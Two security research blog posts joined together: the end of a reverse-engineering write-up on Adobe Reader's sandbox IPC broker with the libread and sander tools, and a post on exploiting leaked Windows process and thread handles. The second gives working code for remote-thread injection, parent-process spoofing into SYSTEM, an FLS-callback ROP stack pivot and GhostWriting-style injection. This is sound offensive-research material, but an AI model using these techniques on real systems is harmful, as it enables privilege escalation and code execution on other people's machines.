Starting with VOIDPTR_TYPE, this is a standard type in the Chromium sandbox so we can just refer to the source code. SharedMemIPCServer::GetArgs calls GetParameterVoidPtr. Simply, once the value itself is extracted it’s cast to a void ptr:

1	`param = (reinterpret_cast<void**>(start));`

This allows tags to reference objects and data within the broker process itself. An example might be NtOpenProcessToken, whose first parameter is a handle to the target process. This would be retrieved first by a call to OpenProcess, handed back to the child process, and then supplied in any future calls that may need to use the handle as a VOIDPTR_TYPE.

In the Chromium source code, INPTR_TYPE is extracted as a raw value via GetRawParameter and no additional processing is performed. However, in Adobe Reader, it’s actually extracted in the same way INOUTPTR_TYPE is.

INOUTPTR_TYPE is wrapped as a CountedBuffer and may be written to during the IPC call. For example, if CreateProcessW is invoked, the PROCESS_INFORMATION pointer will be of type INOUTPTR_TYPE.

The final type is MEM_TYPE, which is unique to Adobe Reader. We can define the structure as:

struct MEM_TYPE {
  HANDLE hProcess;
  DWORD lpBaseAddress;
  SIZE_T nSize;
};

As mentioned, this type is primarily used to transfer data buffers to and from the broker process. It seems crazy. Each tag is responsible for performing its own validation of the provided values before they’re used in any ReadProcessMemory/WriteProcessMemory call.

Once the broker has parsed out the passed arguments, it fetches the context dispatcher and identifies our tag handler:

1
2
3

ContextDispatcher = *(int (__thiscall ****)(_DWORD, int *, int *))(Context + 24);// fetch dispatcher function from Server control
target_info = Context + 28;
handler = (**ContextDispatcher)(ContextDispatcher, &ipc_params, &callback_generic);// PolicyBase::OnMessageReady

The handler is fetched from PolicyBase::OnMessageReady, which winds up calling Dispatcher::OnMessageReady. This is a pretty simple function that crawls the registered IPC tag list for the correct handler. We finally hit InvokeCallbackArgs, unique to Reader, which invokes the handler with the proper argument count:

switch ( ParamCount )
  {
    case 0:
      v7 = callback_generic(_this, CrossCallParamsEx);
      goto LABEL_20;
    case 1:
      v7 = ((int (__thiscall *)(void *, int, _DWORD))callback_generic)(_this, CrossCallParamsEx, *args);
      goto LABEL_20;
    case 2:
      v7 = ((int (__thiscall *)(void *, int, _DWORD, _DWORD))callback_generic)(_this, CrossCallParamsEx, *args, args[1]);
      goto LABEL_20;
    case 3:
      v7 = ((int (__thiscall *)(void *, int, _DWORD, _DWORD, _DWORD))callback_generic)(
             _this,
             CrossCallParamsEx,
             *args,
             args[1],
             args[2]);
      goto LABEL_20;

[...]

In total, Reader supports tag functions with up to 17 arguments. I have no idea why that would be necessary, but it is. Additionally note the first two arguments to each tag handler: context handler (dispatcher) and CrossCallParamsEx. This last structure is actually the broker’s version of a CrossCallParams with more paranoia.

A single function is used to register IPC tags, called from a single initialization function, making it relatively easy for us to scrape them all at runtime. Pulling out all of the IPC tags can be done both statically and dynamically; the former is far easier, the latter is more accurate. I’ve implemented a static generator using IDAPython, available in this project’s repository (ida_find_tags.py), and can be used to pull all supported IPC tags out of Reader along with their parameters. This is not going to be wholly indicative of all possible calls, however. During initialization of the sandbox, many feature checks are performed to probe the availability of certain capabilities. If these fail, the tag is not registered.

Tags are given a handle to CrossCallParamsEx, which gives them access to the CrossCallReturn structure. This is defined here and, repeated from above, defined as:

struct CrossCallReturn {
  uint32 tag_;
  uint32 call_outcome;
  union {
    NTSTATUS nt_status;
    DWORD win32_result;
  };

  HANDLE handle;
  uint32 extended_count;
  MultiType extended[kExtendedReturnCount];
};

This 52 byte structure is embedded in the CrossCallParams transferred by the sandboxed process. Once the tag has returned from execution, the following occurs:

 if (error) {
    if (handler)
      SetCallError(SBOX_ERROR_FAILED_IPC, call_result);
  } else {
    memcpy(call_result, &ipc_info.return_info, sizeof(*call_result));
    SetCallSuccess(call_result);
    if (params->IsInOut()) {
      // Maybe the params got changed by the broker. We need to upadte the
      // memory section.
      memcpy(ipc_buffer, params.get(), output_size);
    }
  }

and the sandboxed process can finally read out its result. Note that this mechanism does not allow for the exchange of more complex types, hence the availability of MEM_TYPE. The final step is signaling the pong_event, completing the call and freeing the channel.

libread

Over the course of this research, I developed a library and set of tools for examining and exercising the Reader sandbox. The library, libread, was developed to programmatically interface with the broker in real time, allowing for quickly exercising components of the broker and dynamically reversing various facilities. In addition, the library was critical during my fuzzing expeditions. All of the fuzzing tools and data will be available in the next post in this series.

libread is fairly flexible and easy to use, but still pretty rudimentary and, of course, built off of my reverse engineering efforts. It won’t be feature complete nor even completely accurate. Pull requests are welcome.

The library implements all of the notable structures and provides a few helper functions for locating the ServerControl from the broker process. As we’ve seen, a ServerControl is a broker’s view of a channel and it is held by the broker alone. This means it’s not somewhere predictable in shared memory and we’ve got to scan the broker’s memory hunting it. From the sandbox side there is also a find_memory_map helper for locating the base address of the shared memory map.

In addition to this library I’m releasing sander. This is a command line tool that consumes libread to provide some useful functionality for inspecting the sandbox:

$ sander.exe -h
[-] sander: [action] <pid>
          -m   -  Monitor mode
          -d   -  Dump channels
          -t   -  Trigger test call (tag 62)
          -c   -  Capture IPC traffic and log to disk
          -h   -  Print this menu

The most useful functionality provided here is the -m flag. This allows one to monitor the IPC calls and their arguments in real time:

$ sander.exe -m 6132
[5184] ESP: 02e1f764    Buffer 029f0134 Tag 266 1 Parameters
      WCHAR_TYPE: _WVWT*&^$
[5184] ESP: 02e1f764    Buffer 029f0134 Tag 34  1 Parameters
      WCHAR_TYPE: C:\Users\bja\desktop\test.pdf
[5184] ESP: 02e1f764    Buffer 029f0134 Tag 247 2 Parameters
      WCHAR_TYPE: C:\Users\bja\desktop\test.pdf
      ULONG_TYPE: 00000000
[5184] ESP: 02e1f764    Buffer 029f0134 Tag 16  6 Parameters
      WCHAR_TYPE: Software\Adobe\Acrobat Reader\DC\SessionManagement
      ULONG_TYPE: 00000040
      VOIDPTR_TYPE: 00000434
      ULONG_TYPE: 000f003f
      ULONG_TYPE: 00000000
      ULONG_TYPE: 00000000
[6020] ESP: 037dfca4    Buffer 029f0134 Tag 16  6 Parameters
      WCHAR_TYPE: cWindowsCurrent
      ULONG_TYPE: 00000040
      VOIDPTR_TYPE: 0000043c
      ULONG_TYPE: 000f003f
      ULONG_TYPE: 00000000
      ULONG_TYPE: 00000000
[5184] ESP: 02e1f764    Buffer 029f0134 Tag 16  6 Parameters
      WCHAR_TYPE: cWin0
      ULONG_TYPE: 00000040
      VOIDPTR_TYPE: 00000434
      ULONG_TYPE: 000f003f
      ULONG_TYPE: 00000000
      ULONG_TYPE: 00000000
[5184] ESP: 02e1f764    Buffer 029f0134 Tag 17  4 Parameters
      WCHAR_TYPE: cTab0
      ULONG_TYPE: 00000040
      VOIDPTR_TYPE: 00000298
      ULONG_TYPE: 000f003f
[2572] ESP: 0335fd5c    Buffer 029f0134 Tag 17  4 Parameters
      WCHAR_TYPE: cPathInfo
      ULONG_TYPE: 00000040
      VOIDPTR_TYPE: 000003cc
      ULONG_TYPE: 000f003f

We’re also able to dump all IPC calls in the brokers’ channels (-d), which can help debug threading issues when fuzzing, and trigger a test IPC call (-t). This latter function demonstrates how to send your own IPC calls via libread as well as allows you to test out additional tooling.

The last available feature is the -c flag, which captures all IPC traffic and logs the channel buffer to a file on disk. I used this primarily to seed part of my corpus during fuzzing efforts, as well as aid during some reversing efforts. It’s extremely useful for replaying requests and gathering a baseline corpus of real traffic. We’ll discuss this further in forthcoming posts.

That about concludes this initial post. Next up I’ll discuss the various fuzzing strategies used on this unique interface, the frustrating amount of failure, and the bugs shooken out.

Resources

http://dronesec.pw/
Exploiting Leaked Process and Thread HandlesBryan Alexander
22 August 2019 at 21:10

Exploiting Leaked Process and Thread Handles

http://dronesec.pw/

By: Bryan Alexander

22 August 2019 at 21:10

Over the years I’ve seen and exploited the occasional leaked handle bug. These can be particularly fun to toy with, as the handles aren’t always granted PROCESS_ALL_ACCESS or THREAD_ALL_ACCESS, requiring a bit more ingenuity. This post will address the various access rights assignable to handles and what we can do to exploit them to gain elevated code execution. I’ve chosen to focus specifically on process and thread handles as this seems to be the most common, but surely other objects can be exploited in similar manner.

As background, while this bug can occur under various circumstances, I’ve most commonly seen it manifest when some privileged process opens a handle with bInheritHandle set to true. Once this happens, any child process of this privileged process inherits the handle and all access it grants. As example, assume a SYSTEM level process does this:

1	`HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, TRUE, GetCurrentProcessId());`

Since it’s allowing the opened handle to be inherited, any child process will gain access to it. If they execute userland code impersonating the desktop user, as a service might often do, those userland processes will have access to that handle.

Existing bugs

There are several public bugs we can point to over the years as example and inspiration. As per usual James Forshaw has a fun one from 2016[0] in which he’s able to leak a privileged thread handle out of the secondary logon service with THREAD_ALL_ACCESS. This is the most “open” of permissions, but he exploited it in a novel way that I was unaware of, at the time.

Another one from Ivan Fratric exploited[1] a leaked process handle with PROCESS_DUP_HANDLE, which even Microsoft knew was bad. In his Bypassing Mitigations by Attacking JIT Server in Microsoft Edge whitepaper, he identifies the JIT server process mapping memory into the content process. To do this, the JIT process needs a handle to it. The content process calls DuplicateHandle on itself with the PROCESS_DUP_HANDLE, which can be exploited to obtain a full access handle.

A more recent example is a Dell LPE [2] in which a THREAD_ALL_ACCESS handle was obtained from a privileged process. They were able to exploit this via a dropped DLL and an APC.

Setup

In this post, I wanted to examine all possible access rights to determine which were exploitable on there own and which were not. Of those that were not, I tried to determine what concoction of privileges were necessary to make it so. I’ve tried to stay “realistic” here in my experience, but you never know what you’ll find in the wild, and this post reflects that.

For testing, I created a simple client and server: a privileged server that leaks a handle, and a client capable of consuming it. Here’s the server:

#include "pch.h"
#include <iostream>
#include <Windows.h>

int main(int argc, char **argv)
{
    if (argc <= 1) {
        printf("[-] Please give me a target PID\n");
        return -1;
    }

    HANDLE hUserToken, hUserProcess;
    HANDLE hProcess, hThread;
    STARTUPINFOA si;
    PROCESS_INFORMATION pi;

    ZeroMemory(&si, sizeof(si));
    si.cb = sizeof(si);
    ZeroMemory(&pi, sizeof(pi));

    hUserProcess = OpenProcess(PROCESS_QUERY_INFORMATION, false, atoi(argv[1]));
    if (!OpenProcessToken(hUserProcess, TOKEN_ALL_ACCESS, &hUserToken)) {
        printf("[-] Failed to open user process: %d\n", GetLastError());
        CloseHandle(hUserProcess);
        return -1;
    }

    hProcess = OpenProcess(PROCESS_ALL_ACCESS, TRUE, GetCurrentProcessId());
    printf("[+] Process: %x\n", hProcess);

    CreateProcessAsUserA(hUserToken, 
        "VulnServiceClient.exe", 
        NULL, NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi);
    SuspendThread(hThread);
    return 0;
}

In the above, I’m grabbing a handle to the token we want to impersonate, opening an inheritable handle to the current process (which we’re running as SYSTEM), then spawning a child process. This child process is simply my client application, which will go about attempting to exploit the handle.

The client is, of course, a little more involved. The only component that needs a little discussion up front is fetching the leaked handle. This can be done via NtQuerySystemInformation and does not require any special privileges:

void ProcessHandles()
{
    HMODULE hNtdll = GetModuleHandleA("ntdll.dll");
    _NtQuerySystemInformation NtQuerySystemInformation =
        (_NtQuerySystemInformation)GetProcAddress(hNtdll, "NtQuerySystemInformation");
    _NtDuplicateObject NtDuplicateObject =
        (_NtDuplicateObject)GetProcAddress(hNtdll, "NtDuplicateObject");
    _NtQueryObject NtQueryObject =
        (_NtQueryObject)GetProcAddress(hNtdll, "NtQueryObject");
    _RtlEqualUnicodeString RtlEqualUnicodeString =
        (_RtlEqualUnicodeString)GetProcAddress(hNtdll, "RtlEqualUnicodeString");
    _RtlInitUnicodeString RtlInitUnicodeString = 
        (_RtlInitUnicodeString)GetProcAddress(hNtdll, "RtlInitUnicodeString");

    ULONG handleInfoSize = 0x10000;
    NTSTATUS status;
    PSYSTEM_HANDLE_INFORMATION phHandleInfo = (PSYSTEM_HANDLE_INFORMATION)malloc(handleInfoSize);
    DWORD dwPid = GetCurrentProcessId();


    printf("[+] Looking for process handles...\n");

    while ((status = NtQuerySystemInformation(
        SystemHandleInformation,
        phHandleInfo,
        handleInfoSize,
        NULL
    )) == STATUS_INFO_LENGTH_MISMATCH)
        phHandleInfo = (PSYSTEM_HANDLE_INFORMATION)realloc(phHandleInfo, handleInfoSize *= 2);

    if (status != STATUS_SUCCESS)
    {
        printf("NtQuerySystemInformation failed!\n");
        return;
    }

    printf("[+] Fetched %d handles\n", phHandleInfo->HandleCount);

    // iterate handles until we find the privileged process
    for (int i = 0; i < phHandleInfo->HandleCount; ++i)
    {
        SYSTEM_HANDLE handle = phHandleInfo->Handles[i];
        POBJECT_TYPE_INFORMATION objectTypeInfo;
        PVOID objectNameInfo;
        UNICODE_STRING objectName;
        ULONG returnLength;

        // Check if this handle belongs to the PID the user specified
        if (handle.ProcessId != dwPid)
            continue;

        objectTypeInfo = (POBJECT_TYPE_INFORMATION)malloc(0x1000);
        if (NtQueryObject(
            (HANDLE)handle.Handle,
            ObjectTypeInformation,
            objectTypeInfo,
            0x1000,
            NULL
        ) != STATUS_SUCCESS)
            continue;

        if (handle.GrantedAccess == 0x0012019f)
        {
            free(objectTypeInfo);
            continue;
        }

        objectNameInfo = malloc(0x1000);
        if (NtQueryObject(
            (HANDLE)handle.Handle,
            ObjectNameInformation,
            objectNameInfo,
            0x1000,
            &returnLength
        ) != STATUS_SUCCESS)
        {
            objectNameInfo = realloc(objectNameInfo, returnLength);
            if (NtQueryObject(
                (HANDLE)handle.Handle,
                ObjectNameInformation,
                objectNameInfo,
                returnLength,
                NULL
            ) != STATUS_SUCCESS)
            {
                free(objectTypeInfo);
                free(objectNameInfo);
                continue;
            }
        }

        // check if we've got a process object; there should only be one, but should we 
        // have multiple, this is where we'd perform the checks
        objectName = *(PUNICODE_STRING)objectNameInfo;
        UNICODE_STRING pProcess, pThread;

        RtlInitUnicodeString(&pThread, L"Thread");
        RtlInitUnicodeString(&pProcess, L"Process");
        if (RtlEqualUnicodeString(&objectTypeInfo->Name, &pProcess, TRUE) && TARGET == 0) {
            printf("[+] Found process handle (%x)\n", handle.Handle);
            HANDLE hProcess = (HANDLE)handle.Handle;
        }
        else if (RtlEqualUnicodeString(&objectTypeInfo->Name, &pThread, TRUE) && TARGET == 1) {
            printf("[+] Found thread handle (%x)\n", handle.Handle);
            HANDLE hThread = (HANDLE)handle.Handle;
        else
            continue;
        
        free(objectTypeInfo);
        free(objectNameInfo);
    }
}

We’re essentially just fetching all system handles, filtering down to ones belonging to our process, then hunting for a thread or a process. In a more active client process with many threads or process handles we’d need to filter down further, but this is sufficient for testing.

The remainder of this post will be broken down into process and thread security access rights.

Process

There are approximately 14 process-specific rights[3]. We’re going to ignore the standard object access rights for now (DELETE, READ_CONTROL, etc.) as they apply more to the handle itself than what it allows one to do.

Right off the bat, we’re going to dismiss the following:

PROCESS_QUERY_INFORMATION
PROCESS_QUERY_LIMITED_INFORMATION
PROCESS_SUSPEND_RESUME
PROCESS_TERMINATE
PROCESS_SET_QUOTA
PROCESS_VM_OPERATION
PROCESS_VM_READ
SYNCHRONIZE

To be clear I’m only suggesting that the above access rights cannot be exploited on their own; they are, of course, very useful when roped in with others. There may be weird edge cases in which one of these might be useful (PROCESS_TERMINATE, for example), but barring any magic, I don’t see how.

That leaves the following:

PROCESS_ALL_ACCESS
PROCESS_CREATE_PROCESS
PROCESS_CREATE_THREAD
PROCESS_DUP_HANDLE
PROCESS_SET_INFORMATION
PROCESS_VM_WRITE

We’ll run through each of these individually.

PROCESS_ALL_ACCESS

The most obvious of them all, this one grants us access to it all. We can simply allocate memory and create a thread to obtain code execution:

char payload[] = "\xcc\xcc";
LPVOID lpBuf = VirtualAllocEx(hProcess, NULL, 2, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
WriteProcessMemory(hProcess, lpBuf, payload, 2, NULL);
CreateRemoteThread(hProcess, NULL, 0, lpBuf, 0, 0, NULL);

Nothing to it.

PROCESS_CREATE_PROCESS

This right is “required to create a process”, which is to say that we can spawn child processes. To do this remotely, we just need to spawn a process and set its parent to the privileged process we’ve got a handle to. This will create the new process and inherit its parent token which will hopefully be a SYSTEM token.

Here’s how we do that:

STARTUPINFOEXA sinfo = { sizeof(sinfo) };
PROCESS_INFORMATION pinfo;
LPPROC_THREAD_ATTRIBUTE_LIST ptList = NULL;
SIZE_T bytes;

sinfo.StartupInfo.cb = sizeof(STARTUPINFOEXA);
InitializeProcThreadAttributeList(NULL, 1, 0, &bytes);
ptList = (LPPROC_THREAD_ATTRIBUTE_LIST)malloc(bytes);
InitializeProcThreadAttributeList(ptList, 1, 0, &bytes);

UpdateProcThreadAttribute(ptList, 0, PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, &hPrivProc, sizeof(HANDLE), NULL, NULL);
sinfo.lpAttributeList = ptList;

CreateProcessA("cmd.exe", (LPSTR)"cmd.exe /c calc.exe", 
        NULL, NULL, TRUE, 
        EXTENDED_STARTUPINFO_PRESENT, NULL, NULL, 
        &sinfo.StartupInfo, &pinfo);

We should now have calc running with the privileged token. Obviously we’d want to replace that with something more useful!

PROCESS_CREATE_THREAD

Here we’ve got the ability to use CreateRemoteThread, but can’t control any memory in the target process. There are of course ways we can influence memory without direct write access, such as WNF, but we’d still have no way of resolving those addresses. As it turns out, however, we don’t need the control. CreateRemoteThread can be pointed at a function with a single argument, which gives us quite a bit of control. LoadLibraryA and WinExec are both great candidates for executing child processes or loading arbitrary code.

As example, there’s an ANSI cmd.exe located in msvcrt.dll at offset 0x503b8. We can pass this as an argument to CreateRemoteThread and trigger a WinExec call to pop a shell:

DWORD dwCmd = (GetModuleBaseAddress(GetCurrentProcessId(), L"msvcrt.dll") + 0x503b8);
HANDLE hThread = CreateRemoteThread(hPrivProc, NULL, 0,
                        (LPTHREAD_START_ROUTINE)WinExec, 
                        (LPVOID)dwCmd, 
                        0, NULL);

We can do something similar for LoadLibraryA. This of course is predicated on the system path containing a writable directory for our user.

PROCESS_DUP_HANDLE

Microsoft’s own documentation on process security and access rights points to this specifically as a sensitive right. Using it, we can simply duplicate our process handle with PROCESS_ALL_ACCESS, allowing us full RW to its address space. As per Ivan Fratric’s JIT bug, it’s as simple as this:

1 2	`HANDLE hDup = INVALID_HANDLE_VALUE; DuplicateHandle(hPrivProc, GetCurrentProcess(), GetCurrentProcess(), &hDup, PROCESS_ALL_ACCESS, 0, 0)`

Now we can simply follow the WriteProcessMemory/CreateRemoteThread strategy for executing arbitrary code.

PROCESS_SET_INFORMATION

Granting this permission allows one to execute SetInformationProcess in addition to several fields in NtSetInformationProcess. The latter is far more powerful, but many of the PROCESSINFOCLASS fields available are either read only or require additional privileges to actually set (SeDebugPrivilege for ProcessExceptionPort and ProcessInstrumentationCallback(win7) for example). Process Hacker[15] maintains an up to date definition of this class and its members.

Of the available flags, none were particularly interesting on their own. I needed to add PROCESS_VM_* privileges in order to make any usable and at that point we defeat the purpose.

PROCESS_VM_*

This covers the three flavors of VM access: WRITE/READ/OPERATION. The first two should be self-explanatory and the third allows one to operate on the virtual address space itself, such as changing page protections (VirtualProtectEx) or allocating memory (VirtualAllocEx). I won’t address each permutation of these three, but I think it’s reasonable to assume that PROCESS_VM_WRITE is a necessary requirement. While PROCESS_VM_OPERATION allows us to crash the remote process which could open up other flaws, it’s not a generic nor elegant approach. Ditto with PROCESS_VM_READ.

PROCESS_VM_WRITE proved to be a challenge on its own, and I was unable to come up with a generic solution. At first blush, the entire set of Shatter-like injection strategies documented by Hexacorn[12] seem like they’d be perfect. They simply require the remote process to use windows, clipboard registrations, etc. None of these are guaranteed, but chances are one is bound to exist. Unfortunately for us, many of them restrict access across sessions or scaling integrity levels. We can write into the remote process, but we need some way to gain control over execution flow.

In addition to being unable to modify page permissions, we cannot read nor map/allocate memory. There are plenty of ways we can leak memory from the remote process without directly interfacing with it, however.

Using NtQuerySystemInformation, for example, we can enumerate all threads inside a remote process regardless of its IL. This grants us a list of SYSTEM_EXTENDED_THREAD_INFORMATION objects which contain, among other things, the address of the TEB. NtQueryInformationProcess allows us to fetch the remote process PEB address. This latter API requires the PROCESS_QUERY_INFORMATION right, however, which ended up throwing a major wrench in my plan. Because of this I’m appending PROCESS_QUERY_INFORMATION onto PROCESS_VM_WRITE which gives us the necessary components to pull this off. If someone knows of a way to leak the address of a remote process PEB without it, I’d love to hear.

The approach I took was a bit loopy, but it ended up working reliably and generically. If you’ve read my previous post on fiber local storage (FLS)[13], this is the research I was referring to. If you haven’t, I recommend giving it a brief read, but I’ll regurgitate a bit of it here.

Briefly, we can abuse fibers and FLS to overwrite callbacks which are executed “…on fiber deletion, thread exit, and when an FLS index is freed”. The primary thread of a process will always setup a fiber, thus there will always be a callback for us to overwrite (msvcrt!_freefls). Callbacks are stored in the PEB (FlsCallback) and the fiber local storage in the TEB (FlsData). By smashing the FlsCallback we can obtain control over execution flow when one of the fiber actions are taken.

With only write access to the process, however, this becomes a bit convoluted. We cannot allocate memory and so we need some known location to put the payload. In addition, the FlsCallback and FlsData variables in PEB/TEB are pointers and we’re unable to read these.

Stashing the payload turned out to be pretty simple. Since we’ve established we can leak PEB/TEB addresses we already have two powerful primitives. After looking over both structures, I found that thread local storage (TLS) happened to provide us with enough room to store ROP gadgets and a thin payload. TLS is embedded within the structure itself, so we can simply offset into the TEB address (which we have). If you’re unfamiliar with TLS, Skywing’s write-ups are fantastic and have aged well[14].

Gaining control over the callback was a little trickier. A pointer to a _FLS_CALLBACK_INFO structure is stored in the PEB (FlsCallback) and is an opaque structure. Since we can’t actually read this pointer, we have no simple way of overwriting the pointer. Or do we?

What I ended up doing is overwriting the FlsCallback pointer itself in the PEB, essentially creating my own fake _FLS_CALLBACK_INFO structure in TLS. It’s a pretty simple structure and really only has one value of importance: the callback pointer.

In addition, as per the FLS article, we also need to take control over ECX/RCX. This will allow us to stack pivot and continue executing our ROP payload. This requires that we update the TEB->FlsData entry which we also are unable to do, since it’s a pointer. Much like FlsCallback, though, I was able to just overwrite this value and craft my own data structure, which also turned out to be pretty simple. The TLS buffer ended up looking like this:

//
// 0  ] 00000000 00000000 [STACK PIVOT] 00000000
// 16 ] 00000000 00000000 [ECX VALUE] [NEW STACK PTR]
// 32 ] 41414141 41414141 41414141 41414141 
//

There just so happens to be a perfect stack pivot gadget located in kernelbase!SwitchToFiberContext (or kernel32!SwitchToFiber on Windows 7):

1 2	`7603c415 8ba1d8000000 mov esp,dword ptr [ecx+0D8h] 7603c41b c20400 ret 4`

Putting this all together, execution results in:

eax=7603c415 ebx=7ffdf000 ecx=7ffded54 edx=00280bc9 esi=00000001 edi=7ffdee28
eip=7603c415 esp=0019fd6c ebp=0019fd84 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
kernel32!SwitchToFiber+0x115:
7603c415 8ba1d8000000    mov     esp,dword ptr [ecx+0D8h]
ds:0023:7ffdee2c=7ffdee30
0:000> p
eax=7603c415 ebx=7ffdf000 ecx=7ffded54 edx=00280bc9 esi=00000001 edi=7ffdee28
eip=7603c41b esp=7ffdee30 ebp=0019fd84 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
kernel32!SwitchToFiber+0x11b:
7603c41b c20400          ret     4
0:000> dd esp l3
7ffdee30  41414141 41414141 41414141

Now we’ve got EIP and a stack pivot. Instead of marking memory and executing some other payload, I took a quick and lazy strategy and simply called LoadLibraryA to load a DLL off disk from an arbitrary location. This works well, is reliable, and even on process exit will execute and block, depending on what you do within the DLL. Here’s the final code to achieve all this:

_NtWriteVirtualMemory NtWriteVirtualMemory = (_NtWriteVirtualMemory)GetProcAddress(GetModuleHandleA("ntdll"), "NtWriteVirtualMemory");

LPVOID lpBuf = malloc(13*sizeof(SIZE_T));
HANDLE hProcess = OpenProcess(PROCESS_VM_WRITE|PROCESS_QUERY_INFORMATION, FALSE, dwTargetPid);
if (hProcess == NULL)
    return;

SIZE_T LoadLibA = (SIZE_T)LoadLibraryA;
SIZE_T RemoteTeb = GetRemoteTeb(hProcess), TlsAddr = 0;
TlsAddr = RemoteTeb + 0xe10;

SIZE_T RemotePeb = GetRemotePeb(hProcess);
SIZE_T PivotGadget = 0x7603c415;
SIZE_T StackAddress = (TlsAddr + 28) - 0xd8;
SIZE_T RtlExitThread = (SIZE_T)GetProcAddress(GetModuleHandleA("ntdll"), "RtlExitUserThread");
SIZE_T LoadLibParam = (SIZE_T)TlsAddr + 48;

//
// construct our TlsSlots payload:
// 0  ] 00000000 00000000 [STACK PIVOT] 00000000
// 16 ] 00000000 00000000 [ECX VALUE] [NEW STACK PTR]
// 32 ] [LOADLIB ADDR] 41414141 [RET ADDR] [LOADLIB ARG PTR]
// 48 ] 41414141
//

memset(lpBuf, 0x0, 16);
*((DWORD*)lpBuf + 2) = PivotGadget;
*((DWORD*)lpBuf+ 4) = 0;
*((DWORD*)lpBuf + 5) = 0;
*((DWORD*)lpBuf + 6) = StackAddress;

StackAddress = TlsAddr + 32;
*((DWORD*)lpBuf + 7) = StackAddress;
*((DWORD*)lpBuf + 8) = LoadLibA;
*((DWORD*)lpBuf + 9) = 0x41414141; // junk
*((DWORD*)lpBuf + 10) = RtlExitThread;
*((DWORD*)lpBuf + 11) = (SIZE_T)TlsAddr + 48;
*((DWORD*)lpBuf + 12) = 0x41414141; // DLL name (AAAA.dll)

NtWriteVirtualMemory(hProcess, (PVOID)TlsAddr, lpBuf, (13 * sizeof(SIZE_T)), NULL);

// update FlsCallback in PEB and FlsData in TEB
StackAddress = TlsAddr + 12;
NtWriteVirtualMemory(hProcess, (LPVOID)(RemoteTeb + 0xfb4), (PVOID)&StackAddress, sizeof(SIZE_T), NULL);
NtWriteVirtualMemory(hProcess, (LPVOID)(RemotePeb + 0x20c), (PVOID)&TlsAddr, sizeof(SIZE_T), NULL);

If all works well you should see attempts to load AAAA.dll off disk when the callback is executed (just close the process). As a note, we’re using NtWriteVirtualMemory here because WriteProcessMemory requires PROCESS_VM_OPERATION which we may not have.

Another variation of this access might be PROCESS_VM_WRITE|PROCESS_VM_READ. This gives us visibility into the address space, but we still cannot allocate or map memory into the remote process. Using the above strategy we can rid ourselves of the PROCESS_QUERY_INFORMATION requirement and simply read the PEB address out of TEB.

Finally, consider PROCESS_VM_WRITE|PROCESS_VM_READ|PROCESS_VM_OPERATION. Granting us PROCESS_VM_OPERATION loosens the restrictions quite a bit, as we can now allocate memory and change page permissions. This allows us to more easily use the above strategy, but also perform inline and IAT hooks.

Thread

As with the process handles, there are a handful of access rights we can dismiss immediately:

SYNCHRONIZE
THREAD_QUERY_INFORMATION
THREAD_GET_CONTEXT
THREAD_QUERY_LIMITED_INFORMATION
THREAD_SUSPEND_RESUME
THREAD_TERMINATE

Which leaves the following:

THREAD_ALL_ACCESS
THREAD_DIRECT_IMPERSONATION
THREAD_IMPERSONATE
THREAD_SET_CONTEXT
THREAD_SET_INFORMATION
THREAD_SET_LIMITED_INFORMATION
THREAD_SET_THREAD_TOKEN

THREAD_ALL_ACCESS

There’s quite a lot we can do with this, including everything described in the following thread access rights sections. I personally find the THREAD_DIRECT_IMPERSONATION strategy to be the easiest.

There is another option that is a bit more arcane, but equally viable. Note that this thread access doesn’t give us VM read/write privileges, so there’s no easy to way to “write” into a thread, since that doesn’t really make sense. What we do have, however, is a series of APIs that sort of grant us that: SetThreadContext[4] and GetThreadContext[5]. About a decade ago a code injection technique dubbed Ghostwriting[6] was released to little fanfare. In it, the author describes a code injection strategy that does not require the typical win32 API calls; there’s no WriteProcessMemory, NtMapViewOfSection, or even OpenProcess.

While the write-up is lacking in a few departments, it’s quite a clever bit of code. In short, the author abuses the SetThreadContext/GetThreadContext calls in tandem with a set of specific assembly gadgets to write a payload, dword by dword, onto the threads stack. Once written, they use NtProtectVirtualMemoryAddress to mark the code RWX and redirect code flow to their payload.

For their write gadget, they hunt for a pattern inside NTDLL:

1 2	`MOV [REG1], REG2 RET`

They then locate a JMP $, or jump here, which will operate as an auto lock and infinitely loop. Once we’ve found our two gadgets, we suspend the thread. We update its RIP to point to the MOV gadget, set our REG1 to an adjusted RSP so the return address is the JMP $, and set REG2 to the jump gadget. Here’s my write function:

void WriteQword(CONTEXT context, HANDLE hThread, size_t WriteWhat, size_t WriteWhere)
{
    SetContextRegister(&context, g_rside, WriteWhat);
    SetContextRegister(&context, g_lside, WriteWhere);

    context.Rsp = StackBase;
    context.Rip = MovAddr;

    WaitForThreadAutoLock(hThread, &context, JmpAddr);
}

The SetContextRegister call simply assigns REG1 and REG2 in our gadget to the appropriate registers. Once those are set, we set our stack base (adjusted from threads RSP) and update RIP to our gadget. The first time we execute this we’ll write our JMP $ gadget to the stack.

They use what they call a thread auto lock to control execution flow (edits mine):

void WaitForThreadAutoLock(HANDLE Thread, CONTEXT* PThreadContext,HWND ThreadsWindow,DWORD AutoLockTargetEIP)
{
    SetThreadContext(Thread,PThreadContext);

    do
    {
        ResumeThread(Thread);
        Sleep(30); 
        SuspendThread(Thread);
        GetThreadContext(Thread,PThreadContext);
    }
    while(PThreadContext->Eip!=AutoLockTargetEIP);
}

It’s really just a dumb waiter that allows the thread to execute a little bit each run before checking if the “sink” gadget has been reached.

Once our execution hits the jump, we have our write primitive. We can now simply adjust RIP back to the MOV gadget, update RSP, and set REG1 and REG2 to any values we want.

I ported the core function of this technique to x64 to demonstrate its viability. Instead of using it to execute an entire payload, I simply execute LoadLibraryA to load in an arbitrary DLL at an arbitrary path. The code is available on Github[11]. Turning it into something production ready is left as an exercise for the reader ;)

Additionally, while attending Blackhat 2019, I saw a process injection talk by the SafeBreach Labs group. They’ve release a code injection tool that contains an x64 implementation of GhostWriting[10]. While I haven’t personally evaluated it, it’s probably more production ready and usable than mine.

THREAD_DIRECT_IMPERSONATION

This differs from THREAD_IMPERSONATE in that it allows the thread token to be impersonated, not simply TO impersonate. Exploiting this is simply a matter of using the NtImpersonateThread[8] API, as pointed out by James Forshaw[0][7]. Using this we’re able to create a thread totally under our control and impersonate the privileged one:

